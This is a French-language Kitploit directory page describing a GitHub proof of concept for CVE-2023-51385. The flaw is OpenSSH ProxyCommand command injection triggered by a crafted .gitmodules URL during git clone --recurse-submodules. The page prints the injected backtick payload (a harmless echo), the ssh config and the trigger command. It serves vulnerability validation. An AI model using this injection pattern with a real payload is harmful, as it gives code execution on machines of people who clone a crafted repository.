Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-51385_test — Preuve de concept pour CVE-2023-51385 : démontre une injection de commande via des URL malveillantes de sous-modules git lors du clonage avec --recurse-submodules, exploitant OpenSSH ProxyCommand. | Kitploit
Outils/GitHubGitHub/featherw1t/cve-2023-51385_test
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubfeatherw1t/cve-2023-51385_test

CVE-2023-51385_test

Preuve de concept pour CVE-2023-51385 : démontre une injection de commande via des URL malveillantes de sous-modules git lors du clonage avec --recurse-submodules, exploitant OpenSSH ProxyCommand.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 2 ansPas encore vérifié

Validation de CVE-2023-51385

Tout d'abord, ajoutez le contenu suivant dans ~/.ssh/config :

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

Il existe une injection de commande dans la déclaration du fichier .gitmodules :

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

Après la configuration, exécutez la commande suivante pour déclencher :

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

Si l'exécution réussit, un fichier cve.txt sera créé dans le répertoire CVE-2023-51385_test.

Remarque : OpenSSH doit être < 9.6p1

Pour plus de détails, consultez ce blog :

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

Télécharger l’outil